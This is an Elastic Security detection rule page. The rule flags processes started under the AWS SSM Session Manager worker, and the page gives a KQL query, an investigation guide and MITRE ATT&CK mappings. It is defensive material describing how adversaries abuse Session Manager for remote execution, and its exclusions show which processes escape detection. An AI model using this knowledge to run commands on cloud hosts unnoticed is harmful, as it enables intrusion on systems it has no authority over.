AWS SSM Session Manager Child Process Execution

IMPORTANT: This documentation is no longer updated. Refer to Elastic's version policy and the latest documentation.

AWS SSM Session Manager Child Process Execution

Identifies process start events where the parent process is the AWS Systems Manager (SSM) Session Manager worker. Session Manager provides interactive shell access to EC2 instances and hybrid nodes without bastion hosts or open inbound ports. Adversaries abuse it for remote execution and lateral movement using legitimate AWS credentials and IAM permissions. This rule surfaces endpoint execution occurring under that worker for visibility and hunting. Expect noise from authorized administrative sessions.

Rule type: query

Rule indices:

logs-endpoint.events.process*
auditbeat-*
logs-auditd_manager.auditd-*
logs-crowdstrike.fdr*
logs-sentinel_one_cloud_funnel.*

Severity: low

Risk score: 21

Runs every: 5m

Searches indices from: now-9m (Date Math format, see also Additional look-back time)

Maximum alerts per execution: 100

References:

Tags:

Domain: Endpoint
Domain: Cloud
OS: Linux
OS: Windows
OS: macOS
Use Case: Threat Detection
Tactic: Execution
Data Source: Elastic Defend
Data Source: Auditd Manager
Data Source: Crowdstrike
Data Source: SentinelOne
Resources: Investigation Guide

Version: 1

Rule authors:

Elastic

Rule license: Elastic License v2

Investigation guide

edit

Triage and analysis

Investigating AWS SSM Session Manager Child Process Execution

AWS Systems Manager Session Manager starts a session worker process on the endpoint; commands and shells you run in the session appear as child processes of that worker. The same mechanism is used for authorized administration and for adversary activity when IAM credentials or instance roles allow ssm:StartSession (or related) abuse.

Possible investigation steps

Confirm whether the host is an EC2 instance or managed node that legitimately uses Session Manager.
Review process.command_line, process.executable, process.user.name, and user.name for the child process to judge intent (reconnaissance, download, credential access, persistence, etc.).
Correlate timing with AWS CloudTrail for StartSession, ResumeSession, or related SSM API calls and the IAM principal that initiated the session.
Pivot on the same host.id or instance identifier for other alerts or SSM activity in the same window.

False positive analysis

Routine interactive or automated administration via Session Manager is expected to match this rule by design.
Prefer exclusions tied to stable attributes (approved IAM roles, automation service accounts, known script paths) rather than broad process-name allowlists unless validated.

Response and remediation

If activity is unauthorized: revoke or rotate exposed IAM credentials, review SSM and VPC endpoints policies, and terminate suspicious sessions from the AWS console or API.
Isolate the instance if compromise is suspected and perform endpoint forensics following your incident response playbook.

Rule query

edit

event.category: "process" and event.action : ("exec" or "exec_event" or "start" or "ProcessRollup2" or "executed" or "process_started") and
(
 process.parent.name:("ssm-session-worker.exe" or "ssm-session-worker" or "ssm-document-worker.exe" or "ssm-document-worker") or
 (process.name : "powershell.exe" and process.args : *awsrunPowerShellScript*) or
 (process.name : ("dash" or "sh" or "bash") and process.args : *awsrunShellScript*) or
 (process.parent.name : "powershell.exe" and process.parent.args : *awsrunPowerShellScript*) or
 (process.parent.name : ("dash" or "sh" or "bash") and process.parent.args : *awsrunShellScript*)
 ) and
 process.command_line:* and
 not (process.name : "powershell.exe" and process.args :("$str.Substring($str.length" or *Convert-GuidToCompressedGuid* or get-wmiobject* or $wmi_proc* or *win32_quickfixengineering*)) and
 not process.executable : ("/usr/bin/lscpu" or "/usr/bin/snap" or "/usr/bin/rpm" or "/usr/bin/dpkg-query" or /snap/snapd/*/usr/bin/snap or "/usr/bin/id" or "C:\\Program Files\\Amazon\\SSM\\Plugins\\SessionManagerShell\\winpty-agent.exe")

Framework: MITRE ATT&CK^TM

Tactic:
- Name: Execution
- ID: TA0002
- Reference URL: https://attack.mitre.org/tactics/TA0002/
Technique:
- Name: Command and Scripting Interpreter
- ID: T1059
- Reference URL: https://attack.mitre.org/techniques/T1059/
Sub-technique:
- Name: Unix Shell
- ID: T1059.004
- Reference URL: https://attack.mitre.org/techniques/T1059/004/
Sub-technique:
- Name: PowerShell
- ID: T1059.001
- Reference URL: https://attack.mitre.org/techniques/T1059/001/
Technique:
- Name: Cloud Administration Command
- ID: T1651
- Reference URL: https://attack.mitre.org/techniques/T1651/

« Multi-Cloud CLI Token and Credential Access Commands AWS EC2 Role GetCallerIdentity from New Source AS Organization »